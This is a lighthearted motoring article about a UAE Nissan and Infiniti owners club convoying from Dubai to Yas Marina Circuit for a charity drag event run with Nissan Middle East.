The GTZ Motor Club is approaching its fourth anniversary. Within that short period of time it has established itself as the home for enthusiastic Nissan and Infiniti performance car owners in the United Arab Emirates and beyond. crankandpiston called shotgun with GTZ President & Founder, Lotfi Aichour, and made our way to the Ibn Battuta Mall to meet up with some of the Dubai members. This, however, was not just another casual GTZ Club/MEGTROC meet.
Our destination would be Yas Marina Circuit, Abu Dhabi, where GTZ Club and MEGTROC (Middle East GT-R Owners Club) would be hosting the second Annual Charity Drag held in co-operation with Nissan Middle East.
It is fantastic to see a major manufacturer getting involved with an owners club. With Samer up front in the black VVIP GT-R, the procession hit the Emirates Road at a legal rate of knots. G’s, Z’s and GT-R’s in vast quantities attract a lot of attention, however, everyone was on their best behaviour. Well, when I say everyone…
Occasionally an idiot photographer (that would be me) would hang out of the window to grab a few shoots for posterity. By the time we reached Abu Dhabi, I looked like the lead singer from T’pau which reinforced the belief that I needed a haircut.
Nissan Middle East had rolled out the GT Academy PS3 simulator at Yas Marina in the hope that a candidate from the UAE would materialize. Guess who was putting in the practice when we arrived?
